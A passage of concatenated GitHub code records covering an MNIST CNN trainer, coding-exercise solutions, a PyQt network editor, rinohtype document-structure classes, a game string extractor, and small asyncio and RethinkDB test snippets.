eval_data = process_data.read_images(file).astype(np.float32)\n with open('MNIST_data/t10k-labels-processed', 'rb') as file:\n eval_labels = process_data.read_labels(file).astype(np.int32)\n eval_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'images': eval_data},\n y=eval_labels,\n batch_size=100,\n shuffle=False)\n\n # Create classifiers.\n model_dirs = ['model/model_%d' % i for i in range(FLAGS.columns)]\n mnist_classifiers = [\n learn.Estimator(\n model_fn=cnn_model_fn,\n # config=learn.RunConfig(save_checkpoints_steps=600),\n model_dir=model_dir)\n for model_dir in model_dirs]\n\n # Train.\n if FLAGS.train:\n # Delete existing model if it exists.\n if FLAGS.clean:\n try:\n tf.gfile.DeleteRecursively('model')\n except tferrors.NotFoundError:\n pass\n\n monitors = [\n # learn.monitors.ValidationMonitor(\n # input_fn=eval_input_fn,\n # every_n_steps=600,\n # metrics={\n # 'accuracy': learn.MetricSpec(\n # metric_fn=tf.metrics.accuracy, prediction_key='classes')\n # })\n ]\n for classifier in mnist_classifiers:\n classifier.fit(\n input_fn=train_input_fn,\n monitors=monitors)\n\n # Evaluate.\n predictions = []\n for classifier in mnist_classifiers:\n probabilities = classifier.predict(\n input_fn=eval_input_fn,\n outputs=['probabilities'])\n prediction = [x['probabilities'] for x in probabilities]\n predictions.append(prediction)\n\n # Print results.\n errors = []\n for i in range(len(predictions)):\n prediction_numbers = np.argmax(predictions[i], axis=1)\n accuracy = np.mean(np.equal(prediction_numbers, eval_labels)) * 100.0\n errors.append(100 - accuracy)\n print('errors %s%%' % str(errors))\n print('average %g stddev %g' % (np.mean(errors), np.std(errors)))\n average_predictions = np.argmax(np.mean(predictions, axis=0), axis=1)\n accuracy = np.mean(np.equal(average_predictions, eval_labels)) * 100.0\n print('multi-column error %g%%' % (100 - accuracy))\n\n\nif __name__ == '__main__':\n 
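A quick check of the feature-map sizes in `cnn_model_fn` above. With 'valid' convolutions and 'same' max-pooling as configured, a 28x28 input gives 25x25 -> 13x13 after the first block and 9x9 -> 3x3 after the second, which matches the 3*3*64 flatten; the inline "26x26 -> 13x13" comment in the record is slightly off.

import math

def conv_valid(size, kernel):
    # 'valid' convolution: no padding, stride 1.
    return size - kernel + 1

def pool_same(size, pool):
    # 'same' pooling with stride == pool size rounds up.
    return math.ceil(size / pool)

s = 28
s = pool_same(conv_valid(s, 4), 2)   # conv_pool1
print(s)                             # -> 13
s = pool_same(conv_valid(s, 5), 3)   # conv_pool2
print(s)                             # -> 3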
tf.app.run()\n","repo_name":"spencels/mnist_cnn","sub_path":"mnist_basic.py","file_name":"mnist_basic.py","file_ext":"py","file_size_in_byte":6802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31053496212","text":"import sys\nsys.stdin = open('13755.txt')\n\ndef palindrome(arr, N, strLens):\n arrRotate = list(map(list, zip(*arr)))\n # 가로로 된 문장 찾기 -> 세로로 된것도 걍 돌림;;;힘드러\n for i in range(N): # 행\n for j in range(N - strLens + 1): # 열\n output = ''\n for k in range(strLens):\n if arr[i][j+k] != arr[i][j+strLens-1-k]:\n break\n output += arr[i][j+k]\n else:\n return output\n\n output = ''\n for k in range(strLens):\n if arrRotate[i][j + k] != arrRotate[i][j + strLens - 1 - k]:\n break\n output += arrRotate[i][j + k]\n else:\n return output\n # 여기는 슬라이싱으로 푼 것\n # char1 = arr[i][j:j+strLens]\n # char2 = arrRotate[i][j:j+strLens]\n # if char1 == char1[::-1]:\n # return ''.join(char1)\n # elif char2 == char2[::-1]:\n # return ''.join(char2)\n\n\nT = int(input())\nfor t in range(1, T+1):\n N, lenM = map(int, input().split())\n text = [list(input()) for _ in range(N)]\n\n ans = palindrome(text, N, lenM)\n print(f'#{t} {ans}')\n\n","repo_name":"gyur1kim/APS-SWEA","sub_path":"알고리즘(1)/0816_string실습/13755_회문문제.py","file_name":"13755_회문문제.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36586468508","text":"import sys\r\nfrom PyQt5.QtWidgets import QApplication, QGraphicsSceneMouseEvent, QMainWindow, QDesktopWidget, QPushButton, QGraphicsScene, QGraphicsView, \\\r\n QTableWidget, QTableWidgetItem, QInputDialog, QGraphicsRectItem, QLabel, QLineEdit, QVBoxLayout, QDialog, QComboBox\r\nfrom PyQt5.QtGui import QColor, QBrush, QPen, QPainter\r\nfrom PyQt5.QtCore import Qt, QPointF, QRectF, pyqtSignal, QTimer, pyqtSlot\r\nfrom PyQt5.QtWidgets import QGraphicsItem, QGraphicsLineItem\r\n\r\nfrom dialogs import RouterDialog, PCDialog, SwitchDialog\r\n\r\n\r\nclass Object(QGraphicsRectItem):\r\n def __init__(self, rect: QRectF, pen: QPen, brush: QBrush):\r\n super().__init__(rect)\r\n self.setFlag(self.ItemIsMovable)\r\n self.setPen(pen)\r\n self.setBrush(brush)\r\n self.connections = []\r\n\r\n def get_type(self) -> str:\r\n return self.type\r\n\r\n def add_connection(self, connection):\r\n self.connections.append(connection)\r\n\r\n def remove_connection(self, connection):\r\n self.connections.remove(connection)\r\n\r\n def update_connections(self):\r\n for connection in self.connections:\r\n connection.update()\r\n\r\n def itemChange(self, change, value):\r\n if change == QGraphicsItem.ItemPositionChange:\r\n self.update_connections()\r\n return super().itemChange(change, value)\r\n\r\n\r\nclass Connection(QGraphicsLineItem):\r\n def __init__(self, start_item, end_item):\r\n super().__init__()\r\n self.start_item = start_item\r\n self.end_item = end_item\r\n self.start_item.add_connection(self)\r\n self.end_item.add_connection(self)\r\n self.update()\r\n\r\n def update(self):\r\n start_pos = self.start_item.pos() + QPointF(self.start_item.rect().width() / 2,\r\n self.start_item.rect().height() / 2)\r\n end_pos = self.end_item.pos() + QPointF(self.end_item.rect().width() / 2,\r\n self.end_item.rect().height() / 2)\r\n self.setLine(start_pos.x(), start_pos.y(), end_pos.x(), end_pos.y())\r\n\r\n\r\nclass Router(Object):\r\n def __init__(self):\r\n super().__init__(QRectF(QPointF(0, 0), QPointF(30, 30)), QPen(Qt.black), QBrush(Qt.gray))\r\n 
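The grid-palindrome search in the SWEA record above checks rows directly and columns by transposing with zip(*arr). The same idea in a compact standalone form, using the slicing variant the original keeps commented out:

def find_palindrome(grid, length):
    rows = [''.join(r) for r in grid]
    cols = [''.join(c) for c in zip(*grid)]   # transpose to reuse the row check
    for line in rows + cols:
        for j in range(len(line) - length + 1):
            chunk = line[j:j + length]
            if chunk == chunk[::-1]:
                return chunk
    return None

print(find_palindrome(['abcba', 'xxyxx', 'abcde'], 5))   # -> 'abcba'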
self.dialog = RouterDialog()\r\n self.type = \"router\"\r\n\r\n def mouseDoubleClickEvent(self, event):\r\n self.dialog.exec()\r\n\r\n\r\nclass Switch(Object):\r\n def __init__(self):\r\n super().__init__(QRectF(QPointF(0, 0), QPointF(50, 30)), QPen(Qt.yellow), QBrush(Qt.white))\r\n self.type = \"switch\"\r\n self.dialog = SwitchDialog()\r\n\r\n def mouseDoubleClickEvent(self, event: QGraphicsSceneMouseEvent):\r\n self.dialog.exec()\r\n\r\n\r\nclass PC(Object):\r\n def __init__(self):\r\n super().__init__(QRectF(QPointF(0, 0), QPointF(30, 30)), QPen(Qt.black), QBrush(Qt.yellow))\r\n self.dialog = PCDialog()\r\n self.type = \"pc\"\r\n\r\n def mouseDoubleClickEvent(self, event: QGraphicsSceneMouseEvent):\r\n self.dialog.exec()\r\n\r\n\r\ndef create_object_of_type(type: str) -> Object:\r\n if type == 'switch':\r\n obj = Switch()\r\n elif type == 'router':\r\n obj = Router()\r\n elif type == 'pc':\r\n obj = PC()\r\n return obj\r\n\r\n\r\nclass MyView(QGraphicsView):\r\n def __init__(self, scene, parent=None):\r\n super().__init__(scene, parent)\r\n self.setRenderHint(QPainter.Antialiasing)\r\n\r\n def mousePressEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n item = self.itemAt(event.pos())\r\n if isinstance(item, Object):\r\n item.setFlag(QGraphicsItem.ItemIsMovable, True)\r\n item.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, True)\r\n\r\n super().mousePressEvent(event)\r\n\r\n def mouseReleaseEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n item = self.itemAt(event.pos())\r\n if isinstance(item, Object):\r\n item.setFlag(QGraphicsItem.ItemIsMovable, False)\r\n item.setFlag(QGraphicsItem.ItemSendsScenePositionChanges, False)\r\n\r\n super().mouseReleaseEvent(event)\r\n\r\n\r\nclass MyWindow(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.initUI()\r\n\r\n def initUI(self):\r\n # Определяем размеры экрана пользователя\r\n screen = QDesktopWidget().screenGeometry()\r\n width, height = screen.width(), screen.height()\r\n # Устанавливаем размеры окна\r\n self.setGeometry(0, 0, width, height)\r\n\r\n self.setWindowTitle('My Application')\r\n self.setStyleSheet(\"background-color: #4d4dff;\")\r\n\r\n # Создаем сцену для отрисовки объектов\r\n self.scene = QGraphicsScene(self)\r\n self.view = MyView(self.scene, self)\r\n self.view.setGeometry(0, 0, width, height)\r\n self.view.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.view.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\r\n self.view.setBackgroundBrush(QBrush(QColor(220, 220, 220)))\r\n\r\n # Добавляем кнопки\r\n self.add_switch_button = QPushButton('Добавить SWITCH', self)\r\n self.add_switch_button.clicked.connect(lambda: self.add_object('switch'))\r\n self.add_switch_button.setGeometry(10, 50, 150, 30)\r\n\r\n self.add_router_button = QPushButton('Добавить маршрутизатор', self)\r\n self.add_router_button.clicked.connect(lambda: self.add_object('router'))\r\n self.add_router_button.setGeometry(10, 100, 150, 30)\r\n\r\n self.add_pc_button = QPushButton('Добавить PC', self)\r\n self.add_pc_button.clicked.connect(lambda: self.add_object('pc'))\r\n self.add_pc_button.setGeometry(10, 150, 150, 30)\r\n\r\n # Создаем список объектов\r\n self.objects = []\r\n\r\n self.connections = []\r\n self.current_connection = None\r\n\r\n self.show()\r\n\r\n def add_object(self, object_type):\r\n obj = create_object_of_type(object_type)\r\n self.scene.addItem(obj)\r\n self.objects.append(obj)\r\n\r\n def mousePressEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n obj = 
self.scene.itemAt(event.pos(), self.view.transform())\r\n if isinstance(obj, Object):\r\n self.current_connection = Connection(obj, None)\r\n self.connections.append(self.current_connection)\r\n\r\n def mouseMoveEvent(self, event):\r\n if self.current_connection:\r\n self.current_connection.update()\r\n\r\n def mouseReleaseEvent(self, event):\r\n if event.button() == Qt.LeftButton:\r\n obj = self.scene.itemAt(event.pos(), self.view.transform())\r\n if isinstance(obj, Object) and self.current_connection:\r\n self.current_connection.end_item = obj\r\n self.current_connection.update()\r\n self.current_connection = None\r\n elif self.current_connection in self.connections:\r\n self.scene.removeItem(self.current_connection)\r\n self.current_connection.start_item.remove_connection(self.current_connection)\r\n self.current_connection.end_item.remove_connection(self.current_connection)\r\n self.connections.remove(self.current_connection)\r\n self.current_connection = None\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = MyWindow()\r\n sys.exit(app.exec_())\r\n","repo_name":"DimaAnglichanin/CiscoPacketPython","sub_path":"CiscoPacket.py","file_name":"CiscoPacket.py","file_ext":"py","file_size_in_byte":7551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28789495494","text":"# ABC301-A\n# TとAの数を比較する\n# 同数ならば、最後に出てくる文字で条件分岐すればいい\nimport sys\n\nrr = lambda: sys.stdin.readline().rstrip()\nri = lambda: int(sys.stdin.readline())\n\nn = ri()\ns = rr()\ncnt_T = s.count('T')\ncnt_A = s.count('A')\nif cnt_T > cnt_A:\n print('T')\nelif cnt_A > cnt_T:\n print('A')\nelse:\n print('A' if s[-1] == 'T' else 'T')\n","repo_name":"calliope-pro/algorithm","sub_path":"problems/ABC/301/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"327756693","text":"from contextlib import suppress\nfrom itertools import chain, takewhile\n\nfrom .attribute import Attribute, Bool, Integer, OverrideDefault\nfrom .draw import Line, LineStyle\nfrom .element import create_destination\nfrom .flowable import GroupedFlowables, StaticGroupedFlowables, WarnFlowable\nfrom .flowable import LabeledFlowable, GroupedLabeledFlowables\nfrom .flowable import Flowable, FlowableStyle, GroupedFlowablesStyle\nfrom .layout import PageBreakException\nfrom .number import NumberStyle, Label, LabelStyle, format_number\nfrom .paragraph import (ParagraphBase, StaticParagraph, Paragraph,\n ParagraphStyle)\nfrom .reference import (ReferenceField, ReferencingParagraph,\n ReferencingParagraphStyle)\nfrom .text import StyledText, SingleStyledText, MixedStyledText, Tab\nfrom .style import PARENT_STYLE\nfrom .strings import StringCollection, String, StringField\nfrom .util import NotImplementedAttribute, itemcount\n\n__all__ = ['Section', 'Heading',\n 'ListStyle', 'List', 'ListItem', 'ListItemLabel', 'DefinitionList',\n 'Header', 'Footer',\n 'TableOfContentsSection', 'TableOfContentsStyle', 'TableOfContents',\n 'ListOfStyle',\n 'TableOfContentsEntry', 'Admonition', 'AdmonitionStyle',\n 'AdmonitionTitleParagraph',\n 'HorizontalRule', 'HorizontalRuleStyle', 'OutOfLineFlowables']\n\n\nclass SectionTitles(StringCollection):\n \"\"\"Collection of localized titles for common sections\"\"\"\n\n contents = String('Title for the table of contents section')\n list_of_figures = String('Title for the list of figures section')\n list_of_tables = String('Title for the 
list of tables section')\n chapter = String('Label for top-level sections')\n index = String('Title for the index section')\n\n\nclass SectionStyle(GroupedFlowablesStyle):\n show_in_toc = Attribute(Bool, True, 'List this section in the table of '\n 'contents')\n\n\nclass NewChapterException(PageBreakException):\n pass\n\n\nclass SectionBase(GroupedFlowables):\n style_class = SectionStyle\n break_exception = NewChapterException\n\n @property\n def category(self):\n return 'Chapter' if self.level == 1 else 'Section'\n\n @property\n def level(self):\n try:\n return self.parent.level + 1\n except AttributeError:\n return 1\n\n @property\n def section(self):\n return self\n\n def show_in_toc(self, container):\n parent_show_in_toc = (self.parent is None\n or self.parent.section is None\n or self.parent.section.show_in_toc(container))\n return (self.get_style('show_in_toc', container)\n and not self.is_hidden(container)\n and parent_show_in_toc)\n\n def create_destination(self, container, at_top_of_container=False):\n pass # destination is set by the section's Heading\n\n\nclass Section(StaticGroupedFlowables, SectionBase):\n \"\"\"A subdivision of a document\n\n A section usually has a heading associated with it, which is optionally\n numbered.\n\n \"\"\"\n\n\nclass HeadingStyle(ParagraphStyle):\n keep_with_next = OverrideDefault(True)\n numbering_level = OverrideDefault(-1)\n\n\nclass Heading(StaticParagraph):\n \"\"\"The title for a section\n\n Args:\n content (StyledText): this heading's text\n\n \"\"\"\n\n style_class = HeadingStyle\n has_title = True\n\n @property\n def referenceable(self):\n return self.section\n\n def prepare(self, container):\n super().prepare(container)\n container.document._sections.append(self.section)\n\n def flow(self, container, last_descender, state=None, **kwargs):\n if self.level == 1 and container.page.chapter_title:\n container.page.create_chapter_title(self)\n result = 0, 0, None\n else:\n result = super().flow(container, last_descender, state, **kwargs)\n return result\n\n def flow_inner(self, container, descender, state=None, **kwargs):\n result = super().flow_inner(container, descender, state=state, **kwargs)\n if not state.initial:\n create_destination(self.section, container, True)\n return result\n\n\nclass ListStyle(GroupedFlowablesStyle, NumberStyle):\n ordered = Attribute(Bool, False, 'This list is ordered or unordered')\n bullet = Attribute(StyledText, SingleStyledText('\\N{BULLET}'),\n 'Bullet to use in unordered lists')\n\n\nclass List(GroupedLabeledFlowables, StaticGroupedFlowables):\n style_class = ListStyle\n\n def __init__(self, list_items, start_index=1,\n id=None, style=None, parent=None):\n super().__init__(list_items, id=id, style=style, parent=parent)\n self.start_index = start_index\n\n def index(self, item, container):\n items = filter(lambda itm: not itm.label.get_style('hide', container),\n takewhile(lambda li: li != item, self.children))\n return self.start_index + itemcount(items)\n\n\nclass ListItem(LabeledFlowable):\n def __init__(self, flowable, id=None, style=None, parent=None):\n label = ListItemLabel()\n super().__init__(label, flowable, id=id, style=style, parent=parent)\n\n\nclass ListItemLabelStyle(ParagraphStyle, LabelStyle):\n number_separator = OverrideDefault(None)\n\n\nclass ListItemLabel(ParagraphBase, Label):\n style_class = ListItemLabelStyle\n\n def text(self, container):\n label = self._label(container)\n return MixedStyledText(self.format_label(label, container), parent=self)\n\n def _label(self, container):\n 
list_item = self.parent\n list = list_item.parent\n if list.get_style('ordered', container):\n number_format = list.get_style('number_format', container)\n separator = self.get_style('number_separator', container)\n index = list.index(list_item, container)\n label = format_number(index, number_format)\n if separator is not None:\n parent_list_item = None\n parent = list.parent\n while parent:\n if isinstance(parent, ListItem):\n parent_list_item = parent\n break\n parent = parent.parent\n if parent_list_item:\n parent_label = parent_list_item.label._label(container)\n separator_string = separator.to_string(container)\n label = parent_label + separator_string + label\n else:\n label = list.get_style('bullet', container)\n return label\n\n\n\nclass DefinitionList(GroupedLabeledFlowables, StaticGroupedFlowables):\n pass\n\n\nclass Header(StaticParagraph):\n pass\n\n\nclass Footer(StaticParagraph):\n pass\n\n\nclass TableOfContentsStyle(GroupedFlowablesStyle, ParagraphStyle):\n depth = Attribute(Integer, 3, 'The number of section levels to include in '\n 'the table of contents')\n\n def __init__(self, base=None, **attributes):\n super().__init__(base=base, **attributes)\n\n\nclass TableOfContentsSection(Section):\n def __init__(self):\n section_title = StringField(SectionTitles, 'contents')\n super().__init__([Heading(section_title, style='unnumbered'),\n TableOfContents()],\n style='table of contents')\n\n def __repr__(self):\n return '{}()'.format(type(self).__name__)\n\n def get_id(self, document, create=True):\n try:\n return document.metadata['toc_ids'][0]\n except KeyError:\n return super().get_id(document, create)\n\n def get_ids(self, document):\n yield self.get_id(document)\n yield from document.metadata.get('toc_ids', [])[1:]\n\n\nclass TableOfContents(GroupedFlowables):\n style_class = TableOfContentsStyle\n location = 'table of contents'\n\n def __init__(self, local=False, id=None, style=None, parent=None):\n super().__init__(id=id, style=style, parent=parent)\n self.local = local\n self.source = self\n\n def __repr__(self):\n args = ''.join(', {}={}'.format(name, repr(getattr(self, name)))\n for name in ('id', 'style')\n if getattr(self, name) is not None)\n return '{}(local={}{})'.format(type(self).__name__, self.local, args)\n\n def flowables(self, container):\n def limit_items(items, section):\n while next(items) is not section: # fast-forward `items` to the\n pass # first sub-section of `section`\n for item in items:\n if item.level <= section.level:\n break\n yield item\n\n depth = self.get_style('depth', container)\n if self.local and self.section:\n depth += self.level - 1\n items = (section for section in container.document._sections\n if section.show_in_toc(container) and section.level <= depth)\n if self.local and self.section:\n items = limit_items(items, self.section)\n for section in items:\n yield TableOfContentsEntry(section, parent=self)\n\n\nclass TableOfContentsEntryStyle(ReferencingParagraphStyle):\n text = OverrideDefault(ReferenceField('number')\n + Tab() + ReferenceField('title')\n + Tab() + ReferenceField('page'))\n\n\nclass TableOfContentsEntry(ReferencingParagraph):\n style_class = TableOfContentsEntryStyle\n\n def __init__(self, flowable, id=None, style=None, parent=None):\n super().__init__(flowable, id=id, style=style, parent=parent)\n\n @property\n def depth(self):\n return self.target_id_or_flowable.level\n\n\nclass ListOfSection(Section):\n list_class = NotImplementedAttribute()\n\n def __init__(self):\n key = 
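The parent walk in `ListItemLabel._label` above composes nested labels such as "2.3" by prepending the enclosing list item's label when a number separator is set. A minimal standalone sketch of the same composition rule, with plain dicts standing in for rinohtype's flowable tree ('index', 'parent', and 'separator' are hypothetical keys used only for the demo):

def nested_label(item):
    label = str(item['index'])
    parent = item.get('parent')
    if parent is not None and item.get('separator'):
        # Prefix the parent's full label, then this item's own index.
        label = nested_label(parent) + item['separator'] + label
    return label

chapter = {'index': 2, 'parent': None, 'separator': None}
section = {'index': 3, 'parent': chapter, 'separator': '.'}
print(nested_label(section))   # -> '2.3'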
'list_of_{}s'.format(self.list_class.category.lower())\n section_title = StringField(SectionTitles, key)\n self.list_of = self.list_class()\n super().__init__([Heading(section_title, style='unnumbered'),\n self.list_of],\n style='list of {}'.format(self.category))\n\n def __repr__(self):\n return '{}()'.format(type(self).__name__)\n\n def is_hidden(self, container):\n return (super().is_hidden(container)\n or self.list_of.is_hidden(container))\n\n\nclass ListOfStyle(GroupedFlowablesStyle, ParagraphStyle):\n pass\n\n\nclass ListOf(GroupedFlowables):\n category = NotImplementedAttribute()\n style_class = ListOfStyle\n\n def __init__(self, local=False, id=None, style=None, parent=None):\n super().__init__(id=id, style=style, parent=parent)\n self.local = local\n self.source = self\n\n def __repr__(self):\n args = ''.join(', {}={}'.format(name, repr(getattr(self, name)))\n for name in ('id', 'style')\n if getattr(self, name) is not None)\n return '{}(local={}{})'.format(type(self).__name__, self.local, args)\n\n @property\n def location(self):\n return 'List of {}s'.format(self.category)\n\n def is_hidden(self, container):\n try:\n next(self.flowables(container))\n except StopIteration:\n return True\n return False\n\n def flowables(self, container):\n document = container.document\n category_counters = document.counters.get(self.category, {})\n\n def limit_items(items, section):\n for item in items: # fast-forward `items` to the\n if item.section is section: # first sub-section of `section`\n yield item\n break\n for item in items:\n if not (item.section.level > section.level\n or item.section is section):\n break\n yield item\n\n def items_in_section(section):\n section_id = (section.get_id(document, create=False)\n if section else None)\n yield from category_counters.get(section_id, [])\n\n items = chain(items_in_section(None),\n *(items_in_section(section)\n for section in document._sections))\n\n if self.local and self.section:\n items = limit_items(items, self.section)\n for caption in items:\n yield ListOfEntry(caption.referenceable, parent=self)\n\n\nclass ListOfEntryStyle(ReferencingParagraphStyle):\n text = OverrideDefault(ReferenceField('reference')\n + ': ' + ReferenceField('title')\n + Tab() + ReferenceField('page'))\n\n\nclass ListOfEntry(ReferencingParagraph):\n style_class = ListOfEntryStyle\n\n\nclass AdmonitionStyle(GroupedFlowablesStyle):\n inline_title = Attribute(Bool, True, \"Show the admonition's title inline \"\n \"with the body text, if possible\")\n\n\nclass AdmonitionTitles(StringCollection):\n \"\"\"Collection of localized titles for common admonitions\"\"\"\n\n attention = String('Title for attention admonitions')\n caution = String('Title for caution admonitions')\n danger = String('Title for danger admonitions')\n error = String('Title for error admonitions')\n hint = String('Title for hint admonitions')\n important = String('Title for important admonitions')\n note = String('Title for note admonitions')\n tip = String('Title for tip admonitions')\n warning = String('Title for warning admonitions')\n seealso = String('Title for see-also admonitions')\n\n\nclass Admonition(StaticGroupedFlowables):\n style_class = AdmonitionStyle\n\n def __init__(self, flowables, title=None, type=None,\n id=None, style=None, parent=None):\n super().__init__(flowables, id=id, style=style, parent=parent)\n self.custom_title = title\n self.admonition_type = type\n\n @property\n def custom_title_text(self):\n return self.custom_title.to_string(None) if self.custom_title else None\n\n 
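# The title shown for this admonition: an explicit custom title wins, otherwise\n    # the localized default string for the admonition type is looked up on the document.\n    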
def title(self, document):\n return (self.custom_title\n or document.get_string(AdmonitionTitles, self.admonition_type))\n\n def flowables(self, container):\n title = self.title(container.document)\n with suppress(AttributeError):\n title = title.copy()\n flowables = super().flowables(container)\n first_flowable = next(flowables)\n inline_title = self.get_style('inline_title', container)\n if inline_title and isinstance(first_flowable, Paragraph):\n title = MixedStyledText(title, style='inline title')\n kwargs = dict(id=first_flowable.id, style=first_flowable.style,\n source=first_flowable.source, parent=self)\n title_plus_content = title + first_flowable.content\n paragraph = AdmonitionTitleParagraph(title_plus_content, **kwargs)\n paragraph.secondary_ids = first_flowable.secondary_ids\n yield paragraph\n else:\n yield Paragraph(title, style='title', parent=self)\n yield first_flowable\n yield from flowables\n\n\nclass AdmonitionTitleParagraph(Paragraph):\n pass\n\n\nclass HorizontalRuleStyle(FlowableStyle, LineStyle):\n pass\n\n\nclass HorizontalRule(Flowable):\n style_class = HorizontalRuleStyle\n\n def render(self, container, descender, state, **kwargs):\n width = float(container.width)\n line = Line((0, 0), (width, 0), parent=self)\n line.render(container)\n return width, 0, 0\n\n\nclass OutOfLineFlowables(GroupedFlowables):\n def __init__(self, name, align=None, width=None, id=None, style=None,\n parent=None):\n super().__init__(align=align, width=width, id=id, style=style,\n parent=parent)\n self.name = name\n\n def prepare(self, container):\n with suppress(KeyError):\n for flowable in container.document.supporting_matter[self.name]:\n flowable.parent = self\n\n def flowables(self, container):\n try:\n yield from container.document.supporting_matter[self.name]\n except KeyError:\n yield WarnFlowable(\"No out-of-line content is registered for \"\n f\"'{self.name}'\", self)\n","repo_name":"brechtm/rinohtype","sub_path":"src/rinoh/structure.py","file_name":"structure.py","file_ext":"py","file_size_in_byte":16362,"program_lang":"python","lang":"en","doc_type":"code","stars":488,"dataset":"github-code","pt":"68"} +{"seq_id":"41468022198","text":"import numpy as np\nfrom joblib import Parallel, delayed\n\n\ndef _permutations(rng, x, n):\n for _ in range(n):\n yield rng.permutation(x)\n\ndef permute_func(func, X, Y, n_perm=99,\n random_state=None, n_procs=1):\n \"\"\"\n Permute Y, apply func to generate a distribution.\n\n Params:\n func: takes X, Y as params and returns a number\n X: ndarray\n Y: ndarray, to permute along first axis\n n_perm: int number of permutations\n random_state: int random seed\n n_procs: int number of processes for parallelization\n\n Returns:\n distrib: ndarray (n_perm,)\n \"\"\"\n rng = np.random.default_rng(random_state)\n perms = _permutations(rng, len(Y), n_perm)\n\n distrib = Parallel(n_jobs=n_procs)(delayed(func)(X, Y[perm])\n for perm in perms)\n return np.array(distrib)\n","repo_name":"kimsin98/utils","sub_path":"permutation.py","file_name":"permutation.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74276648537","text":"from ..helper import get_singular_name\nfrom ..write_text import write_text\n\n\ndef parse_body_part(json, origin):\n # See comments in `body_part_struct::load` of bodypart.cpp about why xxx\n # and xxx_multiple are not inside a single translation object.\n name = get_singular_name(json[\"name\"])\n\n write_text(json[\"name\"], 
origin, comment=\"Name of body part\")\n\n    if \"name_multiple\" in json:\n        write_text(json[\"name_multiple\"], origin, comment=\"Name of body part\")\n\n    write_text(json[\"accusative\"], origin,\n               comment=\"Accusative name of body part\")\n\n    if \"accusative_multiple\" in json:\n        write_text(json[\"accusative_multiple\"], origin,\n                   comment=\"Accusative name of body part\")\n\n    write_text(json[\"encumbrance_text\"], origin,\n               comment=\"Encumbrance text of body part \\\"{}\\\"\".format(name))\n\n    write_text(json[\"heading\"], origin,\n               comment=\"Heading of body part \\\"{}\\\"\".format(name))\n\n    write_text(json[\"heading_multiple\"], origin,\n               comment=\"Heading of body part \\\"{}\\\"\".format(name))\n\n    if \"smash_message\" in json:\n        write_text(json[\"smash_message\"], origin,\n                   comment=\"Smash message of body part \\\"{}\\\"\".format(name))\n\n    if \"hp_bar_ui_text\" in json:\n        write_text(json[\"hp_bar_ui_text\"], origin,\n                   comment=\"HP bar UI text of body part \\\"{}\\\"\".format(name))\n","repo_name":"CleverRaven/Cataclysm-DDA","sub_path":"lang/string_extractor/parsers/body_part.py","file_name":"body_part.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":9151,"dataset":"github-code","pt":"68"}
+{"seq_id":"74726953177","text":"import asyncio\nimport random\n\n\nasync def my_other(id):\n    process_time = random.randint(1, 5)\n    await asyncio.sleep(process_time)\n    print(f\"Coroutine {id} has successfully completed after {process_time} seconds\")\n\n\nasync def my_coroutine():\n    tasks = []\n    for i in range(10):\n        tasks.append(asyncio.ensure_future(my_other(i)))\n    await asyncio.gather(*tasks)\n    print(\"All done\")\n\n\ndef main():\n    loop = asyncio.get_event_loop()\n    try:\n        loop.run_until_complete(my_coroutine())\n    finally:\n        loop.close()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"artheadsweden/python_adv_april19","sub_path":"Day2/Async3.py","file_name":"Async3.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"26341272638","text":"for i in range(0, 256):\n    print(i)\n\n\nfor i in range(0, 1000, 5):\n    print(i)\n\n\n# print \"Coding\" for multiples of 5 and \"Coding DoJo\" for multiples of 10\nfor count in range(1, 100, 1):\n    if count % 5 == 0:\n        print(\"Coding\")\n    if count % 10 == 0:\n        print(\"Coding DoJo\")\n\n\n# print the odd numbers between 0 and 300\nfor countOdd in range(0, 300, 1):\n    if countOdd % 2 == 1:\n        print(countOdd)\n\n\n\ny = 2018\nwhile y > 0:\n    print(y)\n    y = y - 4\n    if y == 0:\n        break\nelse:\n    print(\"Final\")\n\ndef reverslist(arr):\n    return list(reversed(arr))\nprint(reverslist([1,2,3,4,5]))\n","repo_name":"MaksimDauhaleu/Python_Stack","sub_path":"python/basic1.py","file_name":"basic1.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
+{"seq_id":"73551813335","text":"from rethinkdb import r\nfrom tests.common import assertEqual\nfrom tests.functional.common import MockTest\n\n\nclass TestTableMod(MockTest):\n    @staticmethod\n    def get_data():\n        return {\n            \"dbs\": {\n                \"db_one\": {\"tables\": {\"one_x\": [], \"one_y\": []}},\n                \"db_two\": {\"tables\": {\"two_x\": [], \"two_y\": []}},\n            }\n        }\n\n    def test_table_list_1(self, conn):\n        expected = set([\"one_x\", \"one_y\"])\n        result = r.db(\"db_one\").table_list().run(conn)\n        assertEqual(expected, set(list(result)))\n\n    def test_table_list_2(self, conn):\n        expected = set([\"two_x\", \"two_y\"])\n        result = r.db(\"db_two\").table_list().run(conn)\n        
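# db_two must report exactly its own tables, untouched by db_one's\n        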
